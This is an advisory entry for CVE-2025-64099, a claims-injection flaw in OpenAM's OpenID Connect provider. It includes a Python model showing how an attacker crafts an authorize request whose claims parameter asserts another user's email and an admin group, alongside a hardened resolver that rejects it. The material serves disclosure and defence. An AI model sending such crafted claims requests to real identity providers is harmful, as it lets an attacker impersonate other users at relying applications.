PT-2025-46699 · Forgerock · Openam

Published 2025-11-12 · Updated 2025-11-13 · CVE-2025-64099
CVSS v4.0: 8.1 (High)
Vector: AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U
Name of the Vulnerable Software and Affected Versions: Open Access Management (OpenAM) versions prior to 16.0.0
Description: Open Access Management (OpenAM) contains a flaw in its OpenID Connect provider. When the "Claims Parameter Supported" setting is enabled, the "oidc-claims-extension.groovy" script allows arbitrary values to be injected into the claims of the ID token or the UserInfo response. Specifically, the authorize endpoint does not prevent a request from carrying a claims parameter whose JSON object customizes the claims returned in the ID token and UserInfo response, and the values supplied in that JSON end up in the issued claims instead of the authenticated user's real attributes. The impact depends on how relying parties use these claims: for example, if a client relies on the email claim to identify the user, an attacker can specify any email address and assume the corresponding identity.
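To make the mechanism concrete, the following is an added Python model of the flaw; it is not OpenAM's own Groovy script, and the user profile, scope-to-claim mapping, endpoint host and function names are assumptions for illustration. It shows the authorize request an attacker would craft, a claims resolver that copies a requested "value" into the token the way the description says the vulnerable script does, and a hardened resolver in which the claims parameter can only select claims already covered by the granted scopes and every value comes from the authenticated user's profile.

```python
import json
from urllib.parse import urlencode

# Constructed sample profile of the authenticated user (hypothetical data).
USER_PROFILE = {
    "sub": "alice",
    "email": "alice@example.com",
    "given_name": "Alice",
    "groups": ["users"],
}

# Assumed scope-to-claim mapping; OpenAM's real configuration differs.
SCOPE_CLAIMS = {
    "openid": ["sub"],
    "email": ["email"],
    "profile": ["given_name"],
}


def parse_claims_parameter(raw):
    """Parse the OIDC `claims` request parameter: a JSON object with optional
    "id_token" and "userinfo" members. Anything unparsable is treated as absent."""
    try:
        obj = json.loads(raw) if raw else {}
    except (TypeError, ValueError):
        return {}
    return obj if isinstance(obj, dict) else {}


def scope_claims(scopes):
    """Claims the user has consented to through the granted scopes."""
    allowed = []
    for scope in scopes:
        allowed.extend(SCOPE_CLAIMS.get(scope, []))
    return allowed


def resolve_claims_vulnerable(scopes, claims_param, profile=USER_PROFILE, section="id_token"):
    """Model of the flawed behaviour: a "value" member in the claims request is
    copied straight into the token, so the requester decides the claim's content."""
    out = {name: profile[name] for name in scope_claims(scopes) if name in profile}
    requested = parse_claims_parameter(claims_param).get(section, {})
    if not isinstance(requested, dict):
        return out
    for name, spec in requested.items():
        if isinstance(spec, dict) and "value" in spec:
            out[name] = spec["value"]  # attacker-controlled content lands in the token
        elif name in profile:
            out[name] = profile[name]
    return out


def resolve_claims_hardened(scopes, claims_param, profile=USER_PROFILE, section="id_token"):
    """Hardened resolution: the claims parameter may only select claims that the
    granted scopes already allow, and every value is taken from the user's profile.
    A requested "value"/"values" is compared against the real value, never emitted.
    Returns (claims, rejected), where rejected lists request entries that could not
    be honoured; an OP should log these, since they are a signal of this attack."""
    allowed = set(scope_claims(scopes))
    requested = parse_claims_parameter(claims_param).get(section, {})
    if not isinstance(requested, dict):
        requested = {}
    out, rejected = {}, []
    for name in sorted(allowed):
        if name not in profile:
            continue
        actual = profile[name]
        spec = requested.get(name)
        if isinstance(spec, dict):
            if isinstance(spec.get("values"), list):
                wanted = spec["values"]
            elif "value" in spec:
                wanted = [spec["value"]]
            else:
                wanted = None
            if wanted is not None and actual not in wanted:
                rejected.append(name)  # the real value still goes out, not the requested one
        out[name] = actual
    # Claims requested outside the granted scopes are not returned at all.
    rejected.extend(sorted(n for n in requested if n not in allowed))
    return out, rejected


def build_authorize_url(authorize_endpoint, client_id, redirect_uri, claims_param,
                        scope="openid email", nonce="n-0S6_WzA2Mj"):
    """Authorize request carrying a claims parameter, as an attacker would craft it."""
    params = {"response_type": "id_token", "client_id": client_id,
              "redirect_uri": redirect_uri, "scope": scope, "nonce": nonce,
              "claims": claims_param}
    return authorize_endpoint + "?" + urlencode(params)


# Constructed attacker payload: asks the OP to assert a different email and group.
ATTACK_CLAIMS = json.dumps({"id_token": {"email": {"value": "admin@example.com"},
                                         "groups": {"value": ["admins"]}}})

if __name__ == "__main__":
    # Assumed host and client; the path is the usual OpenAM OAuth2 authorize endpoint.
    url = build_authorize_url("https://openam.example.com/openam/oauth2/authorize",
                              "rp-client", "https://rp.example.com/cb", ATTACK_CLAIMS)
    print(url)
    print("vulnerable:", resolve_claims_vulnerable(["openid", "email"], ATTACK_CLAIMS))
    print("hardened:  ", resolve_claims_hardened(["openid", "email"], ATTACK_CLAIMS))
```

Run as a script: the vulnerable resolver returns an ID token body with email "admin@example.com" and groups ["admins"] for a session that actually belongs to alice, while the hardened resolver returns alice's real email, drops the out-of-scope "groups" request, and reports both entries as rejected. The same check applies to the UserInfo section by passing section="userinfo".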
Recommendations: Versions prior to 16.0.0 should be updated to version 16.0.0 or later.

Weakness Enumeration

Special Elements Injection
Code Injection

Related Identifiers

CVE-2025-64099
GHSA-39HR-239P-FHQC

Affected Products

Openam